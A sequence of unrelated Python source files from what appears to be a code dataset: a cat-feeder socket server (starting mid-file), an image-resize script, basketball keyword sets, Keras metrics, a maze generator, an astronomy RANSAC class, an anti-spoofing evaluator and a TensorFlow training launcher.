current food weight on hardware, coming from the pico server connection\r\ndef updateWeight(weight):\r\n    global currFoodWeight\r\n    currFoodWeight = weight\r\n# change the feeding schedule\r\ndef updateSchedule(new_schedule: list, number: int):\r\n    global feedSchdule\r\n    feedSchdule = list()\r\n\r\n    for i in range(number):\r\n        time_list = new_schedule[i].split(\":\")\r\n        hour = time_list[0]\r\n        minute = time_list[1]\r\n        second = \"0\"\r\n        time_str = str(hour) + \" \" + str(minute) + \" \" + second  # avoid shadowing the time module\r\n        feedSchdule.append((time_str, False))\r\n# send history info to web server in the form of: \"feed [feedNum] {[feedTime] [feedAmount]} clean [cleanNum] {[cleanTime]}\r\ndef sendHistory(conn):\r\n    msg = \"\"\r\n    feedNum = len(feedHistory)\r\n    msg += \"feed \"\r\n    msg += str(feedNum)\r\n\r\n    for i in range(feedNum):\r\n        t_str = feedHistory[i][0]\r\n        amount: str = feedHistory[i][1]\r\n        msg += \" \"\r\n        msg += t_str\r\n        msg += \" \"\r\n        msg += amount\r\n\r\n    cleanNum = len(cleanHistory)\r\n    msg += \" clean \"\r\n    msg += str(cleanNum)\r\n    for i in range(cleanNum):\r\n        t_str = cleanHistory[i]\r\n        msg += \" \"\r\n        msg += t_str\r\n    print(f\"sendHistory {msg}\")\r\n    reply(conn, msg)\r\n\r\n# send current schedule info to web server in the form of: \"[scheduleNum] {[feedTime]}\r\ndef sendSchedule(conn):\r\n    msg = \"\"\r\n    pairNum = len(feedSchdule)\r\n    for i in range(pairNum):\r\n        time_str_list = feedSchdule[i][0].split()\r\n        msg += 
time_str_list[0]\r\n msg += \":\"\r\n msg += time_str_list[1]\r\n if i != pairNum - 1 :\r\n msg += \" \"\r\n \r\n print(f\"sendSchedule {msg}\")\r\n reply(conn, msg)\r\n\r\n# interaction with pico W through socket + logic control\r\ndef handle_pico(conn, msg_list):\r\n command = msg_list[1]\r\n if command == \"instruction\":\r\n sendInst(conn)\r\n elif command == \"weight\":\r\n w = float(msg_list[2])\r\n updateWeight(w)\r\n\r\n# interaction with web server\r\ndef handle_web(conn,msg_list):\r\n command = msg_list[1]\r\n if command == \"feed\":\r\n global manualFeed\r\n manualFeed = True\r\n elif command == \"clean\":\r\n global manualClean\r\n manualClean = True\r\n elif command == \"update\":\r\n number = int(msg_list[2])\r\n new_schedule: list = msg_list[3:-1]\r\n amount = msg_list[-1]\r\n updateSchedule(new_schedule, number)\r\n update_max_food(amount)\r\n elif command == \"history\":\r\n sendHistory(conn)\r\n elif command == \"schedule\":\r\n sendSchedule(conn)\r\n elif command == \"play\":\r\n status = msg_list[2]\r\n update_play(status)\r\n \r\n# general message receive from client\r\ndef handle_client(conn, addr):\r\n print(f\"New connection {addr} connected\")\r\n connected = True\r\n while connected:\r\n msg_length = conn.recv(HEADER).decode(FORMAT)\r\n if msg_length:\r\n msg_length = int(msg_length)\r\n msg = conn.recv(msg_length).decode(FORMAT)\r\n print(*msg)\r\n msg_list = msg.split()\r\n client_id = msg_list[0]\r\n # recognize different devices by message fisrt word: part of protocal\r\n if client_id == \"pico\":\r\n handle_pico(conn, msg_list)\r\n elif client_id == \"web\":\r\n handle_web(conn, msg_list)\r\n else:\r\n print(\"unknown connection device\") \r\n conn.close()\r\n\r\n# server action\r\ndef start():\r\n # start both servers listening to their ports\r\n server_pico.listen()\r\n server_web.listen()\r\n pico_connected = False\r\n while True:\r\n # can only have one pico connection\r\n if not pico_connected: \r\n conn, addr = server_pico.accept()\r\n pico_connected = True\r\n # communicate with client on a new thread\r\n thread = threading.Thread(target=handle_client, args=(conn, addr))\r\n thread.start()\r\n print(f\"Active connection: {threading.activeCount() - 1}\" )\r\n # could have multiple web connections\r\n conn1, addr1 = server_web.accept()\r\n # communicate with client on a new thread\r\n thread1 = threading.Thread(target=handle_client, args=(conn1, addr1))\r\n thread1.start()\r\n print(f\"Active connection: {threading.activeCount() - 1}\" )\r\n\r\nprint(\"Server is starting...\")\r\nstart()\r\n","repo_name":"BobbbbbZ/CPEN-291-Project2-Automated-cat-feeding-and-remote-interaction-system","sub_path":"VM backend server.py","file_name":"VM backend server.py","file_ext":"py","file_size_in_byte":9908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72126850681","text":"from PIL import Image\nimport os\nimport sys\nargs = sys.argv\nbasewidth = int(args[1])\nbaseheigth = int(args[2])\npath=args[3]\nprint(\"Resizing all png images in \" + path + \" to [\" +str(basewidth) + \"x\"+str(baseheigth)+ \"] .\")\nfiles=[]\n#m = input(\"Mode (r/s) > \")\nfor r, d, f in os.walk(path):\n for file in f:\n if '.png' in file:\n if '.mcmeta' in file:\n continue;\n files.append(os.path.join(r, file))\n\n\nfor f in files:\n print(f)\n img = Image.open(f)\n img=img.resize((basewidth,baseheigth),Image.ANTIALIAS)\n img.save(f)\n print(\"saved : \" + 
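# Standalone illustration of the wire protocol implemented by reply() and
# handle_client() above: every message is preceded by a fixed 64-byte,
# space-padded ASCII length field. socket.socketpair() stands in for the real
# pico/web connections so the sketch runs without any network setup. A
# production receiver would loop on recv() until the full length arrives; the
# single recv() here is enough for a small local demo.
import socket

HEADER = 64
FORMAT = "utf-8"

def send_framed(conn, msg):
    payload = msg.encode(FORMAT)
    header = str(len(payload)).encode(FORMAT).ljust(HEADER, b' ')
    conn.sendall(header + payload)

def recv_framed(conn):
    length = int(conn.recv(HEADER).decode(FORMAT))
    return conn.recv(length).decode(FORMAT)

a, b = socket.socketpair()
send_framed(a, "feed 100.0")
print(recv_framed(b))  # -> feed 100.0
a.close()
b.close()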
f)\n","repo_name":"ClientCrash/ImgResize","sub_path":"image_resize.py","file_name":"image_resize.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15001189361","text":"MAVS = set([\"Dirk\", \"Nowitzki\", \"mavs\", \"JET\", \"Terry\", \"Barea\", \n \"jjbareapr\", \"Tyson\", \"Chandler\", \"Marion\", \"Matrix\", \n \"Custodian\", \"Kidd\", \"Stojakovic\", \"Peja\", \"Carlisle\", \n \"Dallas\", \"Maverick\"])\nHEAT = set([\"Bosh\", \" Wade \", \"LBJ\", \"Lebron\", \"Heat \", \"HEATBIH\", \n \"Cavs\", \"Cleveland\", \"Cavaliers\", \"Bibby\", \n \"Dwyane\", \"Miller\", \"Chalmers\", \"Udonis\", \"Haslem\",\n \"Spolestra\"])\nFINALS = set([\"Finals\", \"NBA\", \"Stern\", \"Champions\", \"champs\", \n \"trophy\", \"quarter\"])","repo_name":"acompa/maps.NBA","sub_path":"corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"hr","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"34957524632","text":"# coding: utf-8\n\"\"\"\nHelper functions for model evaluation\n\"\"\"\n\nimport keras.backend as K\nfrom keras.callbacks import Callback\nimport numpy as np\nfrom sklearn.metrics import (precision_score, recall_score, f1_score)\nfrom sklearn.metrics import roc_auc_score\n\n\ndef get_coefs(word, *arr): \n \"\"\"\n \"\"\"\n return word, np.asarray(arr, dtype='float32')\n\nclass RocAucEvaluation(Callback):\n \"\"\"\n \"\"\"\n def __init__(self, logger, validation_data=(), interval=1):\n super(Callback, self).__init__()\n\n self.interval = interval\n self.X_val, self.y_val = validation_data\n self.logger = logger\n\n def on_epoch_end(self, epoch, logs={}):\n if epoch % self.interval == 0:\n y_pred = self.model.predict(self.X_val, verbose=0)\n score = roc_auc_score(self.y_val, y_pred)\n self.logger.info(\"\\n ROC-AUC - epoch: %d - score: %.6f \\n\" % (epoch+1, score))\n\nclass Metrics(Callback):\n \"\"\"\n \"\"\"\n\n def __init__(self, logger):\n self.logger = logger\n self.dev_f1s = []\n self.dev_recalls = []\n self.dev_precisions = []\n\n def on_train_begin(self, logs={}):\n self.dev_f1s = []\n self.dev_recalls = []\n self.dev_precisions = []\n\n def on_epoch_end(self, epoch, logs={}):\n dev_predict = (np.asarray(self.model.predict(self.model.validation_data[0]))).round()\n dev_targ = self.model.validation_data[1]\n\n self.dev_f1s.append(f1_score(dev_targ, dev_predict, average='micro'))\n self.dev_recalls.append(recall_score(dev_targ, dev_predict))\n self.dev_precisions.append(precision_score(dev_targ, dev_predict))\n\n f1 = f1_score(dev_targ, dev_predict, average='micro')\n precision = precision_score(dev_targ, dev_predict),\n recall = recall_score(dev_targ, dev_predict)\n\n self.logger.info(\"Metrics: - dev_f1: %s — dev_precision: %s — dev_recall %s\", f1, precision, recall)\n return\n\ndef f1(y_true, y_pred):\n \"\"\"\n Use Recall and precision metrics to calculate harmonic mean (f1)\n\n Only computes a batch-wise average of recall.\n\n Computes the recall, a metric for multi-label classification of\n how many relevant items are selected.\n \"\"\"\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n recall = true_positives / (possible_positives + K.epsilon())\n f1 = 2*((precision*recall)/(precision+recall))\n\n return 
f1\n","repo_name":"ivyleavedtoadflax/kaggle-toxic","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8972089821","text":"import random\n\nlaberinto = []\n\nfor pocicionFila in range( 0, 7 ):\n fila = []\n for pocicionColumna in range(0,11):\n fila.append(\"#\")\n laberinto.append(fila)\n\nfilaAleatoria = random.randint(0,6)\ncolumnaAleatoria = random.randint(0,10)\n\nlaberinto[ filaAleatoria ][ columnaAleatoria ] = \" \"\n\nnumeroParedes = 30\nnumeroEspacios = 77 - numeroParedes\n\nx = filaAleatoria\ny = columnaAleatoria\n\n# ----\nwhile True:\n if(numeroEspacios == 1):\n break\n\n arriba = [x-1, y]\n abajo = [x+1, y]\n izquierda = [x, y-1]\n derecha = [x, y+1]\n\n movientos = [arriba, abajo, izquierda, derecha]\n\n numeroAleatorio = random.randint(0,3)\n\n sgtMovimiento = movientos[ numeroAleatorio ]\n\n while True:\n if( sgtMovimiento[0] >= 0 and sgtMovimiento[0] < 7 and sgtMovimiento[1] >= 0 and sgtMovimiento[1] < 11):\n\n if(laberinto[ sgtMovimiento[0] ] [ sgtMovimiento[1] ] == \"#\"):\n laberinto[sgtMovimiento[0]][sgtMovimiento[1]] = \" \"\n x = sgtMovimiento[0]\n y = sgtMovimiento[1]\n numeroEspacios = numeroEspacios - 1\n break\n elif( laberinto[ sgtMovimiento[0] ] [ sgtMovimiento[1] ] == \" \" ):\n x = sgtMovimiento[0]\n y = sgtMovimiento[1]\n break\n else:\n numeroAleatorio = random.randint(0,len(movientos)-1 )\n sgtMovimiento = movientos[ numeroAleatorio ]\n\n # print(\"----------------\")\n # for fila in laberinto:\n # print(\"\".join(fila))\n\n\n\n\nfor fila in laberinto:\n print(\"\".join(fila))\n","repo_name":"jhonnyckuno/Lab-Sis420","sub_path":"P01.py","file_name":"P01.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37594709238","text":"import numpy as np\nfrom shapely.geometry.polygon import LineString\nfrom base.Distances import lineseg_dists\nfrom scipy import stats\n\n\nclass RansacIsochrone:\n def __init__(self, shift_x=0.1, shift_y=-0.75):\n self.shift_x = shift_x\n self.shift_y = shift_y\n\n def create_multiline(self, points, shift_length=1e3):\n # Compute unit vector in opposite direction of line shift\n vec = np.array([-self.shift_x, -self.shift_y])\n # normalize vector to unit length\n vec /= np.linalg.norm(vec)\n # create line with points as start point and shifted points as end point\n line = np.stack([points, points + vec*shift_length], axis=1)\n return line\n\n def intersection(self, points, line):\n A = self.create_multiline(points)\n res = np.array([line.intersects(LineString(a)) for a in A], dtype=int)\n return res\n\n def is_inside_main_and_binaries(self, points, isochrone):\n # Compute binary line\n binaries = np.copy(isochrone)\n binaries[:, 0] += self.shift_x\n binaries[:, 1] += self.shift_y\n # Convert into shapely linestrings\n isoline = LineString(isochrone)\n binaryline = LineString(binaries)\n # Compute intersections\n nb_intersections = self.intersection(points, isoline) + self.intersection(points, binaryline)\n return nb_intersections == 1\n\n def closest_point_on_isochrone_and_binary(self, points, isochrone):\n # closest point on isochrone\n closest_points_sl = lineseg_dists(points, isochrone[1:], isochrone[:-1])\n # closest point on binary isochrone\n binaries = np.copy(isochrone)\n binaries[:, 0] += self.shift_x\n binaries[:, 1] += self.shift_y\n closest_points_bl = lineseg_dists(points, 
binaries[1:], binaries[:-1])\n # compute minimum between both\n dists_sl = np.linalg.norm(closest_points_sl - points, axis=1)\n dists_bl = np.linalg.norm(closest_points_bl - points, axis=1)\n closest_isochrone_arg = np.argmin(np.stack([dists_sl, dists_bl]), axis=0)\n cond = closest_isochrone_arg == 0\n closest_points = np.where(cond[:, None], closest_points_sl, closest_points_bl)\n return closest_points\n\n @staticmethod\n def n_sigma_distance(n_sigma):\n \"\"\"Mahanobolis distance to n sigma conversion\"\"\"\n quantile = stats.norm.cdf(n_sigma) - stats.norm.cdf(-n_sigma)\n return np.sqrt(-2 * np.log(1 - quantile))\n\n def is_inside_Nsigma_radius(self, points, std_devs, isochrone, n_sigma=3):\n \"\"\"Check if points are N standard deviations from isochrone\n Assumes diagonal covariance matrix\n \"\"\"\n # Compute component wise differences\n x1_y1, x2_y2 = np.square(points - self.closest_point_on_isochrone_and_binary(points, isochrone)).T\n # Get standard deviations\n std_x1, std_y1 = std_devs.T\n # Underestimation correction\n uc = 2\n # Compute Mahalanobolis distance\n dists = np.sqrt((x1_y1 / (uc * std_x1**2)) + (x2_y2 / (uc * std_y1**2)))\n # dists = np.sqrt((x1_y1 / std_x1) + (x2_y2 / std_y1))\n # Compute N sigma radius\n is_still_inside = dists < self.n_sigma_distance(n_sigma)\n return is_still_inside\n\n def fit(self, isochrone, points, std_devs, n_sigma=3):\n # check if points are inside main isochrone and binary isochrone\n is_inside = self.is_inside_main_and_binaries(points, isochrone)\n # check if points are inside N sigma radius\n is_still_inside = self.is_inside_Nsigma_radius(points, std_devs, isochrone, n_sigma=n_sigma)\n # combine both conditions\n is_still_inside = is_still_inside | is_inside\n return is_still_inside\n","repo_name":"ratzenboe/Chronos","sub_path":"base/RANSAC.py","file_name":"RANSAC.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4975363143","text":"import os\nfrom os import PRIO_PGRP\nimport numpy as np\nfrom sklearn import metrics\nimport shutil\n\ndef eval_res(pred, label, isShow=False, eval_type=\"ERR_strict\",eval_val='self', thresh=None):\n\n name2idx = {}\n idx = 0\n data = [] \n with open(pred, \"r\") as f:\n for line in f.readlines():\n name, score = line.strip().split(\" \")\n # name = os.path.join('train',name)\n name2idx[name] = idx\n data.append([float(score), -1])\n idx += 1\n with open(label, \"r\") as f:\n for line in f.readlines():\n name, label = line.strip().split(\" \") #0 3 -1 [0:real] [1:mask1] [3:mask3] [-1:unknown]\n if name in name2idx:\n if eval_val=='self':\n data[name2idx[name]][1] = 1-int(label)\n else:\n data[name2idx[name]][1] = int(label)\n else:\n print(\"{} not in the predict txt\".format(name))\n data = np.array(data)\n if thresh is not None:\n thres = thresh\n FN = np.sum((data[:, 0] < thres) & ((data[:, 1] == 0)))\n FP = np.sum((data[:, 0] >= thres) & ((data[:, 1] == 1) | (data[:, 1] == 3)))\n BPCER = 1. * FN / (np.sum(data[:, 1] == 0))\n APCER = 1. 
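# Numeric sanity check for n_sigma_distance above: for a 2-D standard normal,
# the Mahalanobis radius that contains the central n-sigma probability mass is
# the Rayleigh quantile sqrt(-2 ln(1 - q)). The Monte Carlo fraction of points
# inside that radius should match q. Standalone sketch:
import numpy as np
from scipy import stats

def n_sigma_distance(n_sigma):
    quantile = stats.norm.cdf(n_sigma) - stats.norm.cdf(-n_sigma)
    return np.sqrt(-2 * np.log(1 - quantile))

for n in (1, 2, 3):
    r = n_sigma_distance(n)
    pts = np.random.default_rng(0).standard_normal((100_000, 2))
    inside = (np.linalg.norm(pts, axis=1) < r).mean()
    print(n, round(float(r), 3), round(float(inside), 3))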
* FP / (np.sum((data[:, 1] == 1) | (data[:, 1] == 3)))\n ACER = (BPCER + APCER) / 2.\n if isShow:\n print(\"Thres:{:.3f} APCER:{:.4f} BPCER:{:.4f} ACER:{:.4f}\".format(thres, APCER, BPCER, ACER))\n \n return thres, APCER, BPCER, ACER\n\n if eval_type == \"min_acer\":\n scores = []\n for i in range(100):\n thres = i / 100\n FN = np.sum((data[:, 0] < thres) & ((data[:, 1] == 0))) + np.sum(data[:, 1]==-1)\n FP = np.sum((data[:, 0] >= thres) & ((data[:, 1] == 1) | (data[:, 1] == 3))) + np.sum(data[:, 1]==-1)\n BPCER = 1. * FN / (np.sum(data[:, 1] == 0))\n APCER = 1. * FP / (np.sum(data[:, 1] != 0))\n ACER = (BPCER + APCER) / 2.\n scores.append([thres, APCER, BPCER, ACER])\n scores = np.array(scores)\n idx = np.argmin(scores, axis=0)[3]\n if isShow:\n print(\"Thres:{:.3f} APCER:{:.4f} BPCER:{:.4f} ACER:{:.4f}\".format(scores[idx, 0], scores[idx, 1], scores[idx, 2], scores[idx, 3]))\n \n return scores[idx, 0], scores[idx, 1], scores[idx, 2], scores[idx, 3]\n \n elif eval_type == \"ERR\":\n scores = []\n for i in range(100):\n thres = i / 100\n FN = np.sum((data[:, 0] < thres) & (data[:, 1] == 0))\n FP = np.sum((data[:, 0] >= thres) & (data[:, 1] != 0))\n BPCER = 1. * FN / np.sum(data[:, 1] == 0) #FNR / FRR\n APCER = 1. * FP / np.sum(data[:, 1] != 0) #FPR / FAR\n ACER = (BPCER + APCER) / 2.\n scores.append([thres, APCER, BPCER, ACER])\n scores = np.array(scores)\n delta = abs(scores[:, 1] - scores[:, 2])\n idx = np.argmin(delta, axis=0)\n\n if isShow:\n print(\"Thres:{:.3f} APCER:{:.4f} BPCER:{:.4f} ACER:{:.4f}\".format(scores[idx, 0], scores[idx, 1], scores[idx, 2], scores[idx, 3]))\n \n return scores[idx, 0], scores[idx, 1], scores[idx, 2], scores[idx, 3]\n \n elif eval_type == \"ERR_strict\":\n scores = []\n for i in range(100):\n thres = i / 100\n FN = np.sum((data[:, 0] < thres) & ((data[:, 1] == 0))) + np.sum(data[:, 1]==-1)\n FP = np.sum((data[:, 0] >= thres) & ((data[:, 1] == 1) | (data[:, 1] == 3))) + np.sum(data[:, 1]==-1)\n BPCER = 1. * FN / (np.sum(data[:, 1] == 0))\n APCER = 1. 
* FP / (np.sum(data[:, 1] != 0))\n \n ACER = (BPCER + APCER) / 2.\n scores.append([thres, APCER, BPCER, ACER])\n scores = np.array(scores)\n delta = abs(scores[:, 1] - scores[:, 2])\n idx = np.argmin(delta, axis=0)\n\n if isShow:\n print(\"Thres:{:.3f} APCER:{:.4f} BPCER:{:.4f} ACER:{:.4f}\".format(scores[idx, 0], scores[idx, 1]*100, scores[idx, 2]*100, scores[idx, 3]*100))\n \n return scores[idx, 0], scores[idx, 1], scores[idx, 2], scores[idx, 3]\n \n return 0, 0, 0, 0\n\ndef calc_acc(pred_res,label_gt,eval_val=\"self\"):\n root_pth = '../raw_data/phase1'\n target_data = '../wrong_pic'\n pred_dic = {}\n label_dic = {}\n with open(pred_res, 'r') as f:\n lines = f.readlines()\n for line in lines:\n name,pred, *_ = line.strip().split(' ')\n # name = os.path.join('train',name)\n # print(name)\n if pred > str(0.5):\n pred = 0\n else:\n pred = 1\n # print(name,pred)\n # print(pred)\n pred_dic[name] = str(pred)\n\n with open(label_gt, 'r') as f:\n lines = f.readlines()\n for line in lines:\n name,pred,*_ = line.strip().split(' ')\n # print(name,pred)\n if eval_val=='self':\n pred = 1-int(pred)\n else:\n if int(pred)>1:\n pred = 1\n label_dic[name] = str(pred)\n # if eval_val=='offical':\n res_txt = open('./se_101.txt', 'w')\n count = 0\n # print(pred_dic,label_dic)\n for name in pred_dic.keys():\n # print(name)\n # name = '%04d.png'%(i+1)\n # print(name)\n if int(pred_dic[name])!=int(label_dic[name]):\n # if eval_val=='self':\n # shutil.copyfile(os.path.join(root_pth,name),os.path.join(target_data,\"_\".join(name.split('/'))))\n # else:\n res_txt.write(name+' '+pred_dic[name]+' '+label_dic[name]+'\\n')\n count+=1\n\n print(count / len(pred_dic) , count)\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"tommyjiang/iccv-2021-anti-spoofing","sub_path":"anti_code/eval_acer.py","file_name":"eval_acer.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71856028280","text":"# -*-coding:utf-8 -*-\n\nimport importlib\nimport tensorflow.compat.v1 as tf\nfrom argparse import ArgumentParser\nfrom tools.loss import LossHP, LossFunc\nfrom tools.train_utils import clear_model, RUN_CONFIG\nfrom dataset.tokenizer import PRETRAIN_CONFIG\nfrom model.mixup import hp_parser as mixup_hp_parser\nfrom model.temporal import hp_parser as temporal_hp_parser\nfrom model.multisource import hp_parser as multisource_hp_parser\nfrom model.adversarial import hp_parser as adversarial_hp_parser\nfrom model.knowledge_distill import hp_parser as knowledge_distill_hp_parser\nfrom model.fgm import hp_parser as fgm_hp_parser\n\n\ndef main():\n parser = ArgumentParser()\n # 确认训练模型和Loss Function\n parser.add_argument(\"--model\", default='bert', type=str)\n parser.add_argument(\"--loss\", default='ce', type=str)\n\n # Semi-Supervised Method\n parser.add_argument('--use_mixup', action='store_true', default=False) # 使用mixup\n parser.add_argument('--use_temporal', action='store_true', default=False) # 使用Temporal\n\n # 领域迁移,领域对抗训练相关\n parser.add_argument('--use_multisource', action='store_true', default=False) # 使用share private multisouce\n parser.add_argument('--use_adversarial', action='store_true', default=False) # 使用share private adversarial\n\n # 对抗训练\n parser.add_argument('--use_fgm', action='store_true', default=False) # 使用FGM\n\n # 模型蒸馏\n parser.add_argument('--knowledge_distill', action='store_true', default=False) # 使用Knowledge Distill进行模型蒸馏\n\n # 导入模型特有HP\n model_name = parser.parse_known_args()[0].model\n model_hp_parser 
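# The hp_parser/trainer lookups in this script resolve a module path from the
# --model flag via importlib, i.e. plugin-style dispatch. Minimal standalone
# sketch of the same pattern; it loads an attribute from a stdlib module, since
# the project's 'model.{name}.model' packages are not reproduced here.
import importlib

def load_attr(module_path, attr):
    module = importlib.import_module(module_path)
    return getattr(module, attr)

# stands in for load_attr('model.bert.model', 'trainer')
sha256 = load_attr('hashlib', 'sha256')
print(sha256(b'demo').hexdigest()[:12])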
= getattr(importlib.import_module('model.{}.model'.format(model_name)), 'hp_parser')\n parser = model_hp_parser.append(parser)\n\n # 导入Loss特有HP\n loss_name = parser.parse_known_args()[0].loss\n loss_hp_parser = LossHP[loss_name]\n parser = loss_hp_parser.append(parser)\n\n # 导入半监督所需HP\n if parser.parse_known_args()[0].use_mixup:\n parser = mixup_hp_parser.append(parser)\n\n if parser.parse_known_args()[0].use_temporal:\n parser = temporal_hp_parser.append(parser)\n\n # 倒入对抗训练\n if parser.parse_known_args()[0].use_fgm:\n parser = fgm_hp_parser.append(parser)\n\n # 导入领域迁移/对抗相关HP\n if parser.parse_known_args()[0].use_multisource:\n parser = multisource_hp_parser.append(parser)\n\n if parser.parse_known_args()[0].use_adversarial:\n parser = adversarial_hp_parser.append(parser)\n\n # 导入模型蒸馏相关HP\n if parser.parse_known_args()[0].knowledge_distill:\n parser = knowledge_distill_hp_parser.append(parser)\n\n # 所有模型通用HP\n parser.add_argument('--nlp_pretrain_model', default='chinese_L-12_H-768_A-12', type=str)\n\n parser.add_argument(\"--ckpt_dir\", type=str)\n parser.add_argument(\"--data_dir\", type=str) # 数据目录默认包含train/test/valid.txt,如果多输入用,分割\n\n parser.add_argument(\"--max_seq_len\", default=150, type=int) # 文本最大长度\n parser.add_argument(\"--label_size\", default=2, type=int) # 文本最大长度\n parser.add_argument(\"--lr\", default=2e-5, type=float)\n\n parser.add_argument(\"--epoch_size\", default=10, type=int)\n parser.add_argument(\"--batch_size\", default=32, type=int)\n parser.add_argument(\"--early_stop_ratio\", default=1, type=float) # 遍历先x%的Eval就early stop\n\n parser.add_argument(\"--log_steps\", default=100, type=float)\n parser.add_argument(\"--save_steps\", default=1000, type=float)\n\n # GPU\n parser.add_argument(\"--use_gpu\", action='store_true', default=False)\n parser.add_argument(\"--device\", default='0', type=str)\n\n # train/predict/export/predict\n parser.add_argument(\"--clear_model\", action='store_true', default=False)\n parser.add_argument(\"--do_train\", action='store_true', default=False) # 训练\n parser.add_argument(\"--do_eval\", action='store_true', default=False) # 测试集预测 & 评估\n parser.add_argument(\"--do_export\", action='store_true', default=False) # 导出模型\n parser.add_argument(\"--do_predict\", action='store_true', default=False) # 对离线样本进行预测\n\n # 以下文件名常规任务不需要改动,对于增强任务,蒸馏任务需要修改为对应的训练,评估文件\n parser.add_argument('--train_file', default='train', type=str) # 训练文件名,默认指代训练集\n parser.add_argument('--valid_file', default='valid', type=str) # 验证文件名用于early stop,默认指代验证集\n parser.add_argument('--eval_file', default='test', type=str) # 评估文件名,默认指代测试集\n parser.add_argument('--predict_file', default='all', type=str) # 预测文件名,默认指代全样本\n\n # 其他\n parser.add_argument(\"--enable_cache\", action='store_true', default=False) # 使用之前tokenizer cache的特征\n parser.add_argument(\"--clear_cache\", action='store_true', default=False) # 清楚之前tokenizer cache的特征\n parser.add_argument(\"--thresholds\", default='0.6,0.7,0.8,0.9') # 评估F1的阈值\n\n args = parser.parse_args()\n\n CKPT_DIR = './checkpoint'\n EXPORT_DIR = './serving'\n DATA_DIR = './trainsample'\n\n TP = {\n 'model': args.model,\n 'ckpt_name': args.ckpt_dir, # checkpoint 名称,用于指代当前模型版本,和为输出文件命名\n 'ckpt_dir': os.path.join(CKPT_DIR, args.ckpt_dir),\n 'export_dir': os.path.join(EXPORT_DIR, args.ckpt_dir), # 这里导出模型和checkpoint默认保持同名\n # 默认预测文件为eval文件,生成文件名和ckpt相同,在distill中需要制定预测文件\n\n 'train_file': args.train_file,\n 'valid_file': args.valid_file,\n 'eval_file': args.eval_file,\n 'predict_file': args.predict_file,\n\n 'nlp_pretrain_model': 
args.nlp_pretrain_model,\n 'nlp_pretrain_dir': PRETRAIN_CONFIG[args.nlp_pretrain_model].model_dir,\n 'nlp_pretrain_ckpt': os.path.join(*PRETRAIN_CONFIG[args.nlp_pretrain_model]),\n\n 'max_seq_len': args.max_seq_len,\n 'label_size': args.label_size,\n 'lr': args.lr,\n 'enable_cache': args.enable_cache,\n 'clear_cache': args.clear_cache,\n\n 'epoch_size': args.epoch_size,\n 'batch_size': args.batch_size,\n 'early_stop_ratio': args.early_stop_ratio,\n\n 'log_steps': args.log_steps,\n 'save_steps': args.save_steps,\n 'thresholds': [float(i) for i in args.thresholds.split(',')] # threshold list to evaluate F1/precision/recall\n }\n\n # Update TP\n TP = model_hp_parser.update(TP, args)\n if parser.parse_known_args()[0].use_mixup:\n TP = mixup_hp_parser.update(TP, args)\n\n if parser.parse_known_args()[0].use_temporal:\n TP = temporal_hp_parser.update(TP, args)\n\n if parser.parse_known_args()[0].use_multisource:\n TP = multisource_hp_parser.update(TP, args)\n\n if parser.parse_known_args()[0].use_adversarial:\n TP = adversarial_hp_parser.update(TP, args)\n\n if parser.parse_known_args()[0].knowledge_distill:\n TP = knowledge_distill_hp_parser.update(TP, args)\n\n if parser.parse_known_args()[0].use_fgm:\n TP = fgm_hp_parser.update(TP, args)\n\n # get loss function\n loss_hp = loss_hp_parser.parse(args)\n TP['loss_func'] = LossFunc[loss_name](**loss_hp)\n\n # 多数据源:得到任务列表和任务数以及label映射\n if args.use_multisource or args.use_adversarial:\n data_list = args.data_dir.split(',')\n TP['data_dir_list'] = [os.path.join(DATA_DIR, i) for i in data_list]\n\n idx2label = {}\n for data_dir in TP['data_dir_list']:\n label2idx = getattr(importlib.import_module('{}.preprocess'.format(data_dir[2:].replace('/', '.'))),\n 'Label2Idx')\n idx2label[data_dir] = dict([(j, i) for i, j in label2idx.items()])\n TP['idx2label'] = idx2label\n else:\n data_dir = os.path.join(DATA_DIR, args.data_dir)\n TP['data_dir'] = data_dir\n TP['data_dir_list'] = [data_dir] # 兼容多任务TP\n label2idx = getattr(importlib.import_module('{}.preprocess'.format(data_dir[2:].replace('/', '.'))),\n 'Label2Idx')\n TP['idx2label'] = {data_dir: dict([(j, i) for i, j in label2idx.items()])} # 兼容多任务\n\n # 删除checkpoint,summary cache\n if args.clear_model:\n clear_model(TP['ckpt_dir'])\n tf.summary.FileWriterCache.clear()\n\n # 如果ckpt为空创建目录\n if not os.path.isdir(TP['ckpt_dir']):\n os.mkdir(TP['ckpt_dir'])\n\n RUN_CONFIG.update({\n 'use_gpu': args.use_gpu,\n 'log_steps': args.log_steps,\n 'save_steps': args.save_steps,\n 'summary_steps': args.save_steps\n })\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.device\n\n if args.use_mixup:\n from model.mixup import get_trainer\n trainer = get_trainer(args.model)\n elif args.use_temporal:\n from model.temporal import get_trainer\n trainer = get_trainer(args.model)\n elif args.use_multisource:\n from model.multisource import get_trainer\n trainer = get_trainer(args.model)\n elif args.use_adversarial:\n from model.adversarial import get_trainer\n trainer = get_trainer(args.model)\n elif args.use_fgm:\n from model.fgm import get_trainer\n trainer = get_trainer(args.model)\n elif args.knowledge_distill:\n from model.knowledge_distill import get_trainer\n trainer = get_trainer(args.model)\n else:\n trainer = getattr(importlib.import_module('model.{}.model'.format(args.model)), 'trainer')\n\n trainer.train(TP, RUN_CONFIG, 